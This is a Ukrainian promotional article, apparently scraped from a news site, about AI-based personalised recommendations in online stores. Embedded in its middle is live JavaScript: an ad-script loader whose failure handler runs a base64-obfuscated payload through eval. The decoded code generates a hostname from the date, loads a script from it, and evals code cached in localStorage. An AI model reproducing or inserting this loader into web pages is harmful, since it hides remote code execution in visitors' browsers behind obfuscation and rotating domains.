Персональні рекомендації в онлайн-торгівлі: як обігнати конкурентів?

Онлайн-торгівля останніми роками активно розвивається, чим привертає увагу потенційних клієнтів. Інтернет-магазини користуються різноманітними рекламними інструментами для того, щоб надати можливість скористатись перевіреними товарами з мінімальними витратами.

Якісна та продумана реклама гугл адс надає можливість збільшити кількість активних покупців. Зазвичай, персональні рекомендації для користувачів формуються за допомогою штучного інтелекту. Вони включають інформацію про поведінкові фактори людей, особисті вподобання та дані про продукцію, що розглядається. За допомогою рекомендацій можна залучити аудиторію, підвищити продажі та пізнаваність бренду з мінімальними ризиками та витратами. Достатньо продумати всі процеси, тому краще довірити цю задачу досвідченим спеціалістам.

Особливості рекомендацій

Товарні рекомендації користуються великою популярністю. Саме через персоналізовані рекомендації користувачі можуть набагато швидше знайти потрібну товарну позицію з мінімальними ризиками. Рекомендації також надають можливість отримати такі вигоди для сучасного бізнесу, що розвивається на українському ринку:

прискорити процеси конверсії та покращити якість обслуговування з мінімальними ризиками та витратами;підвищити середню суму покупок клієнтів через використання різноманітних вигідних товарних пропозицій;продовжити загальний час перегляду сторінок на сайті відповідно до інтересів користувачів, а також шанси на продаж товарної позиції;просувати ті товари та послуги, які дійсно потрібні;підвищити якість використання порталу для потенційних клієнтів за допомогою використання сучасних інструментів.

Розсилки надають можливість кожному користувачу покращити статистику та досвід використання порталу відповідно до індивідуальних потреб кожного користувача. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Інтеграція персональних рекомендацій

Рекомендаційні блоки формуються залежно від індивідуальних особливостей кожного клієнта. Бувають загальні та персональні блоки для кожного, що дозволяє сформувати оптимальний досвід співробітництва.

Загальні блоки надають можливість просувати товари та послуги для широкої аудиторії, показувати загальні акційні пропозиції. Також існують персональні пропозиції, які формуються індивідуально на основі того контенту, який передивляється користувач. Кожен може ознайомитись з різноманітними варіантами реклами для того, щоб скористатися.

Кожен варіант пропозиції формується індивідуально залежно від того, наскільки довго клієнт користується послугами клієнтів. Існує кілька доступних варіантів, якими може скористатись кожен за допомогою професіоналів.
(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/personalni-rekomendatsiyi-v-onlajn-torgivli-yak-obignati-konkurentiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top